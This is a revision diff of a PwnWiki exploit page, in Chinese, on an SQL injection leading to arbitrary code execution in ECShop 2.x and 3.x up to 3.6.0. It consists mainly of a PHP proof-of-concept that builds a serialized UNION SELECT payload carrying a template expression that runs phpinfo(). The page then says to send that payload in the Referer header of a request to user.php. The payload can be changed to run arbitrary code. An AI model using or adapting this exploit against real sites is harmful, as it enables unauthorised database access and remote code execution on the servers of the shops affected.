Difference between revisions of "ECShop SQL注入任意代碼執行漏洞"

From PwnWiki
(Created page with "<languages /> <translate> ==影響版本== </translate> <pre> Ecshop 2.x Ecshop 3.x-3.6.0 </pre> ==POC== <pre> <?php $shell = bin2hex("{\$asd'];phpinfo\t();//}xxx");...")
 
(Marked this version for translation)
 
Line 2: Line 2:
  
 
<translate>
 
<translate>
==影響版本==
+
==影響版本== <!--T:1-->
 
</translate>
 
</translate>
 
<pre>
 
<pre>
Line 34: Line 34:
  
 
<translate>
 
<translate>
==漏洞利用==
+
==漏洞利用== <!--T:2-->
 
</translate>
 
</translate>
  
  
 
<translate>
 
<translate>
 +
<!--T:3-->
 
訪問
 
訪問
 
</translate>
 
</translate>
Line 46: Line 47:
  
 
<translate>
 
<translate>
 +
<!--T:4-->
 
添加referer請求頭,將poc放入再請求,可以看到執行了phpinfo()
 
添加referer請求頭,將poc放入再請求,可以看到執行了phpinfo()
 
</translate>
 
</translate>

Latest revision as of 19:29, 7 April 2021

Other languages:
Chinese • ‎español • ‎中文(繁體)‎

影響版本

Ecshop 2.x    
Ecshop 3.x-3.6.0

POC

<?php 
$shell = bin2hex("{\$asd'];phpinfo\t();//}xxx");
$id = "-1' UNION/*";
$test = sprintf("*/SELECT 1,0x%s,2,4,5,6,7,8,0x%s,10-- -", bin2hex($id), $shell);
$arr = array();
$arr["num"]=$test;
$arr["id"]=$id;

$s = serialize($arr);

$hash3 = '45ea207d7a2b68c49582d2d22adf953a';
$hash2 = '554fcae493e564ee0dc75bdf2ebf94ca';

echo "POC for ECShop 2.x: \n";
echo "{$hash2}ads|{$s}{$hash2}";
echo "\n\nPOC for ECShop 3.x: \n";
echo "{$hash3}ads|{$s}{$hash3}";

?>


漏洞利用

訪問 

http://127.0.0.1/user.php

添加referer請求頭,將poc放入再請求,可以看到執行了phpinfo()

Retrieved from "https://pwnwiki.com/index.php?title=ECShop_SQL注入任意代碼執行漏洞&oldid=1110"